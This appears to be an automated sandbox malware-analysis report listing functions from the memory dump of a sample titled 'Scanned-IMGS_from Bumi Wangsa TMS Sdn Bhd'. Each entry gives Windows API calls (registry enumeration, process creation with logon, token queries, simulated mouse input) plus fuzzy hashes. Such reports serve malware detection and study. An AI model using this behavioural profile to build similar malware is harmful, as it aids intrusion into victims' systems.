                                                        • Instruction ID: 9a6666ea8d4e6c218d9fe15804c444647b171512f0b27f1b632eba730265c745
                                                        • Opcode Fuzzy Hash: 9ad4f600f6ea179408f3292df07f361297fe0c0445670343e3cac3c0ad9295d4
                                                        • Instruction Fuzzy Hash: 46213035604109AF9B14DFE8DC89DABB7ACEB1D760B50C275F919CB2A0DB709C428B64
                                                        Function 00A7B6AF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00A7B6C7
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A7B6E4
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7B71C
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A7B742
                                                        • _wcsstr.LIBCMT ref: 00A7B74C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID: @U=u
                                                        • API String ID: 3902887630-2594219639
                                                        • Opcode ID: 00dfb02f181b4bd6c62cc921deaee6279ff597a7a7c7cf579904b5ecf9b3c345
                                                        • Instruction ID: f851080b7410ea42e550e623de0a629bb297e0d7207a37371af2f5677ebd9c14
                                                        • Opcode Fuzzy Hash: 00dfb02f181b4bd6c62cc921deaee6279ff597a7a7c7cf579904b5ecf9b3c345
                                                        • Instruction Fuzzy Hash: 73210A71605244BBEB299B759D49F7B7BA8DF85710F00C039F909CA1A1EB61CC4192A0
                                                        Function 00A797E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79802
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79834
                                                        • __itow.LIBCMT ref: 00A7984C
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79874
                                                        • __itow.LIBCMT ref: 00A79885
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID: @U=u
                                                        • API String ID: 2983881199-2594219639
                                                        • Opcode ID: cf738d0139e8ef8bc11720d682ec8c5858e2fd2e788261edce44603e287bfcc1
                                                        • Instruction ID: dcf47ea61c9e11c3dc4fcfd8c82eb1688cd4f2bffc3b90315d0e6a7aa3f52a9f
                                                        • Opcode Fuzzy Hash: cf738d0139e8ef8bc11720d682ec8c5858e2fd2e788261edce44603e287bfcc1
                                                        • Instruction Fuzzy Hash: 9621B331A00204ABDB10DBA59D86EEF7BA8EF4A710F088036F909AB291D7708D4587D2
                                                        Function 00AA783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AA78A1
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AA78AE
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AA78B9
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AA78C8
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AA78D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 38f0961c16883c0f10a456ba7fde9057842dfac3e7c6cc5c66c812a4a15ee5c8
                                                        • Instruction ID: ce6623aecc89d89487f43c8c06f49906876865818fcab1f12614a2394fae886e
                                                        • Opcode Fuzzy Hash: 38f0961c16883c0f10a456ba7fde9057842dfac3e7c6cc5c66c812a4a15ee5c8
                                                        • Instruction Fuzzy Hash: 7A1190B2110219BFEF159FA4CC85EEB7F6DEF0D7A8F014115BA04A6090C7729C61DBA0
                                                        Function 00A441C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A44292,?), ref: 00A441E3
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A441EA
                                                        • EncodePointer.KERNEL32(00000000), ref: 00A441F6
                                                        • DecodePointer.KERNEL32(00000001,00A44292,?), ref: 00A44213
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 3489934621-340411864
                                                        • Opcode ID: f1596fc52df185041005a1fce3c5b6f7fefc0045823256860111285c57f39a7d
                                                        • Instruction ID: c5f0bbf00629589d670391895d1efa2d7bc5a89336a03fa411daa9c24e3145a8
                                                        • Opcode Fuzzy Hash: f1596fc52df185041005a1fce3c5b6f7fefc0045823256860111285c57f39a7d
                                                        • Instruction Fuzzy Hash: AEE012B4590741AEEF20EBF0EC49B443A98B799703F104A24F521D90E0D7B540979F10
                                                        Function 00A4429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A441B8), ref: 00A442B8
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A442BF
                                                        • EncodePointer.KERNEL32(00000000), ref: 00A442CA
                                                        • DecodePointer.KERNEL32(00A441B8), ref: 00A442E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: 5f1ddc709ec7a1e956e6000498a3c9b28101fc0803afc2c83c1e809855d666ff
                                                        • Instruction ID: a872e87ed9e4dfc67b220b1c5d50993a4ad72ca5dcbd4a38b52aacfdcc52a44c
                                                        • Opcode Fuzzy Hash: 5f1ddc709ec7a1e956e6000498a3c9b28101fc0803afc2c83c1e809855d666ff
                                                        • Instruction Fuzzy Hash: 41E0B6BC681342AFEF54EBE1EC4DB853AACB769742F104A29F111E90E0CBB44546DB14
                                                        Function 00A8675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 443bcbea03257af6778d6f137f86389caba87f09aab181fa486d5aa69778a124
                                                        • Instruction ID: 094384b2f13af5a0fe35ec9e474144bde861712f768cd796bbc92fd822c7609d
                                                        • Opcode Fuzzy Hash: 443bcbea03257af6778d6f137f86389caba87f09aab181fa486d5aa69778a124
                                                        • Instruction Fuzzy Hash: B961C13050066A9BEF11FF64DE82EFF37A4AF48708F044529F8595B292DB349D45CB90
                                                        Function 00AA046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0548
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA0588
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AA05AB
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AA05D4
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AA0617
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0624
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: aa7374e0fca0033d290da4ab065a35b136f853c9e91b9743cb1db595c78fd1fa
                                                        • Instruction ID: 5c63f6a20d8ff60c3a8adac53d640e3716f49afbad7a5c03f853c90047394ba2
                                                        • Opcode Fuzzy Hash: aa7374e0fca0033d290da4ab065a35b136f853c9e91b9743cb1db595c78fd1fa
                                                        • Instruction Fuzzy Hash: 79516931508201AFCB14EF68D985E6FBBE8FF89314F04892DF585872A1DB71E905CB52
                                                        Function 00AA5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00AA5A82
                                                        • GetMenuItemCount.USER32(00000000), ref: 00AA5AB9
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AA5AE1
                                                        • GetMenuItemID.USER32(?,?), ref: 00AA5B50
                                                        • GetSubMenu.USER32(?,?), ref: 00AA5B5E
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AA5BAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 229b99c1a7a725f7581630cf49880b25337e1a6c886acdf642638a296ee84fee
                                                        • Instruction ID: 0dee75fb8d9f59b0e24ae26af4c628d21635225f6370fbd7f3de132665ca8496
                                                        • Opcode Fuzzy Hash: 229b99c1a7a725f7581630cf49880b25337e1a6c886acdf642638a296ee84fee
                                                        • Instruction Fuzzy Hash: A2519F35E00625EFCF15EFA4C945AAEB7B4EF49720F104469F802BB391DB71AE418B94
                                                        Function 00A7F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A7F3F7
                                                        • VariantClear.OLEAUT32(00000013), ref: 00A7F469
                                                        • VariantClear.OLEAUT32(00000000), ref: 00A7F4C4
                                                        • _memmove.LIBCMT ref: 00A7F4EE
                                                        • VariantClear.OLEAUT32(?), ref: 00A7F53B
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A7F569
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 117140ce41a22e6ef61a6d486f10dfc0bab4b95a86d1441a0563d22fb44b1aea
                                                        • Instruction ID: b15519b9aeb555622a6bb9e3fc180b7dca83dc1fa7f67beb717fe12c34aa8930
                                                        • Opcode Fuzzy Hash: 117140ce41a22e6ef61a6d486f10dfc0bab4b95a86d1441a0563d22fb44b1aea
                                                        • Instruction Fuzzy Hash: 595158B5A00209AFCB14CF58D880AAAB7B8FF4C354B15C169ED59DB340D730EA12CBA0
                                                        Function 00A826F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82747
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82792
                                                        • IsMenu.USER32(00000000), ref: 00A827B2
                                                        • CreatePopupMenu.USER32 ref: 00A827E6
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00A82844
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A82875
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: a966accdbf1265a2b05b2ee04bbeb625ed5bfc2b63d1d20892c9971585dd494b
                                                        • Instruction ID: 1f6779cc0ba91734116ad84a5fbd09b5f0dc1e0603a344378760da801662e2c7
                                                        • Opcode Fuzzy Hash: a966accdbf1265a2b05b2ee04bbeb625ed5bfc2b63d1d20892c9971585dd494b
                                                        • Instruction Fuzzy Hash: A751AD70A0030AEFDF25EFA8D988BBEBBF5EF45314F104269E8119B291D7709945CB51
                                                        Function 00A21765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A2179A
                                                        • GetWindowRect.USER32(?,?), ref: 00A217FE
                                                        • ScreenToClient.USER32(?,?), ref: 00A2181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A2182C
                                                        • EndPaint.USER32(?,?), ref: 00A21876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: fd51865bf56028152fca8cb46d845760570c0302667022961b0c220585608c3b
                                                        • Instruction ID: 19f0046c9445ab4e674bb976cfc3a350f34ce2cce849433e6380c427f897f2a7
                                                        • Opcode Fuzzy Hash: fd51865bf56028152fca8cb46d845760570c0302667022961b0c220585608c3b
                                                        • Instruction Fuzzy Hash: E541BC70100251AFD710DFA8D8C4BBA7BF9FB6A764F140638FA948A2A1C7309806DB61
                                                        Function 00A973B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00A95134,?,?,00000000,00000001), ref: 00A973BF
                                                          • Part of subcall function 00A93C94: GetWindowRect.USER32(?,?), ref: 00A93CA7
                                                        • GetDesktopWindow.USER32 ref: 00A973E9
                                                        • GetWindowRect.USER32(00000000), ref: 00A973F0
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A97422
                                                          • Part of subcall function 00A854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        • GetCursorPos.USER32(?), ref: 00A9744E
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A974AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 8f380957c9c9cc3c69a2277a0b453e847a6511c0b0b088d76595a2d436e104bd
                                                        • Instruction ID: a001263128a9e21f369bf5bd0fb91dc794ed17830ef47a9e9acc86ede0b77130
                                                        • Opcode Fuzzy Hash: 8f380957c9c9cc3c69a2277a0b453e847a6511c0b0b088d76595a2d436e104bd
                                                        • Instruction Fuzzy Hash: 3031C372608316AFDB24DF94D849E5BBBE9FB89314F000919F58997191DB30E9098B92
                                                        Function 00A78D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A78608
                                                          • Part of subcall function 00A785F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A78612
                                                          • Part of subcall function 00A785F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A78621
                                                          • Part of subcall function 00A785F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A78628
                                                          • Part of subcall function 00A785F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7863E
                                                        • GetLengthSid.ADVAPI32(?,00000000,00A78977), ref: 00A78DAC
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A78DB8
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A78DBF
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A78DD8
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00A78977), ref: 00A78DEC
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78DF3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
                                                        • Instruction ID: 6f8fe92ca74acfcb2b646ebdd2e0242bf6ae0579aa457c9968c9a8e8160f032c
                                                        • Opcode Fuzzy Hash: 293fb243b1781449df11f46f6cc997fca84341a27b19bd4b59970022163bf27f
                                                        • Instruction Fuzzy Hash: 9811CA31641606EFDB24CBA4CC0CBAE7BA9EB42316F10C129E84993291DB3A9901CB60
                                                        Function 00A78AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A78B2A
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A78B31
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A78B40
                                                        • CloseHandle.KERNEL32(00000004), ref: 00A78B4B
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A78B7A
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A78B8E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
